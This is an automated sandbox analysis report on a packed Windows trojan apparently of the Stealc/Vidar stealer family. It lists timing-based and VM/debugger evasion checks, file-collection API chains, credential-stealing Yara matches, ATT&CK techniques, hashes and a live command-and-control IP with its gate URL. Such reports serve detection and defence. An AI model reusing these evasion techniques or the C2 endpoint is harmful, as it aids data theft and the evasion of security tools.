                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280E8E second address: 1280EA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0790D580ADh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280EA1 second address: 1280EC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0790D58138h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280602 second address: 1280608 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280608 second address: 1280635 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0790D58126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f jmp 00007F0790D5812Bh 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jng 00007F0790D58126h 0x0000001d jmp 00007F0790D5812Ah 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280635 second address: 128063F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0790D580A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128063F second address: 1280650 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0790D5812Ch 0x00000008 js 00007F0790D58126h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12807C1 second address: 12807C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128093E second address: 1280949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0790D58126h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280949 second address: 128094E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128094E second address: 1280979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0790D58126h 0x0000000a pop edi 0x0000000b push esi 0x0000000c jmp 00007F0790D58137h 0x00000011 pop esi 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280979 second address: 1280980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280C2D second address: 1280C33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280C33 second address: 1280C39 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1283FB1 second address: 1283FCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F0790D5812Dh 0x0000000d pop edi 0x0000000e push eax 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12895D5 second address: 12895EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0790D580B0h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128A5C6 second address: 128A5E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D58131h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F0790D5812Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128AF1F second address: 128AF4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0790D580ACh 0x0000000a jc 00007F0790D580A6h 0x00000010 pop eax 0x00000011 pushad 0x00000012 jmp 00007F0790D580B1h 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a pop esi 0x0000001b jnp 00007F0790D580A6h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128AF4C second address: 128AF6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F0790D58126h 0x00000010 jmp 00007F0790D58131h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128AF6D second address: 128AF8E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0790D580A6h 0x00000008 jmp 00007F0790D580ADh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 js 00007F0790D580A6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128FFE5 second address: 128FFF8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F0790D5812Ah 0x0000000a pop edi 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129317D second address: 1293183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12932BE second address: 12932DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F0790D5812Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 ja 00007F0790D58126h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12932DD second address: 12932E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 1071841 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 1244553 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 1221AEE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E238B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_00E238B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E24910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00E24910
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E1DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_00E1DA80
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E1E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_00E1E430
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E24570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00E24570
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E1ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_00E1ED20
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E116D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00E116D0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E23EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00E23EA0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E1F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00E1F6B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E1BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_00E1BE70
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E1DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00E1DE10
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E11160 GetSystemInfo,ExitProcess | 0_2_00E11160
                Source: file.exe, file.exe, 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1448686604.00000000008DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1448686604.0000000000955000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1448686604.0000000000927000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWh
                Source: file.exe, 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13348
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13345
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13399
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13359
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13366
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E145C0 VirtualProtect ?,00000004,00000100,00000000 | 0_2_00E145C0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E29860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00E29860
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E29750 mov eax, dword ptr fs:[00000030h] | 0_2_00E29750
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E278E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA | 0_2_00E278E0
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 7656, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E29600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_00E29600
                Source: file.exe | Binary or memory string: W|IProgram Manager
                Source: file.exe, 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: W|IProgram Manager
                Source: file.exe, 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: W|IProgram Manager=L*
                Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree | 0_2_00E27B90
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E27980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA | 0_2_00E27980
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E27850 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_00E27850
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E27A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA | 0_2_00E27A30

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.file.exe.e10000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1448686604.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1400847337.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 7656, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 0.2.file.exe.e10000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1448686604.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1400847337.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 7656, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP
                Mitre Att&ck Matrix (techniques listed per tactic; a leading number is the count shown in the report for that technique)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                Execution: 2 Command and Scripting Interpreter; 11 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Defense Evasion: 1 Masquerading; 33 Virtualization/Sandbox Evasion; 11 Disable or Modify Tools; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
                Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                Discovery: 2 System Time Discovery; 641 Security Software Discovery; 33 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 324 System Information Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Source | Detection | Scanner | Label
file.exe | 42% | ReversingLabs | Win32.Trojan.Generic
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37 | file.exe, 00000000.00000002.1448686604.00000000008DE000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpo | file.exe, 00000000.00000002.1448686604.0000000000942000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.37/e2b1563c6670f193.phpT | file.exe, 00000000.00000002.1448686604.0000000000939000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.37/ws | file.exe, 00000000.00000002.1448686604.0000000000939000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.37/e2b1563c6670f193.php8 | file.exe, 00000000.00000002.1448686604.0000000000939000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1520515
                              Start date and time:2024-09-27 12:52:06 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 4m 58s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:10
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 80%
                              • Number of executed functions: 19
                              • Number of non-executed functions: 88
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: file.exe
                              No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | 8y4qT1eVpi.exe | malicious | Amadey, Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                              No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | 8y4qT1eVpi.exe | malicious | Amadey, Stealc | 185.215.113.103
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
No context
                              No created / dropped files found
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.946449456437186
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'853'952 bytes
                              MD5:fb6e05d5c008f119efcdeefe60d6e924
                              SHA1:76fca4e5da3cff2eee99634b2f442850000ce47f
                              SHA256:b01a2006b9ca98754e6c54ea5940b99dba53720fd9f0b83a4024a7061723f90d
                              SHA512:dfbf12f37b792017329c03fbaec55d4a2cd3c4735defe551d25b91468ed20a2413efcd5c762b2ea68b64028ae895e547141140589500f7156468652696bb342a
                              SSDEEP:24576:qnSxEL5/h2QbgoJH7kBuNdi2dxda+AkFH4tipqAKNIwDLr4907QZJyMM7loA6fwz:q15/4M73Rn4tOzm7k0e0ot4dpv
                              TLSH:22853373ED9BC6F2D1B623B8ADF39B722476723104C86D80FAE3D16D4A2B5D9240424D
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L.../..f...........
                              Icon Hash:00928e8e8686b000
                              Entrypoint:0xaa2000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x66F1BA2F [Mon Sep 23 18:57:51 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x25b000 | 0x22800 | 603926d2fc830520e0a55e67ce4f6455 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
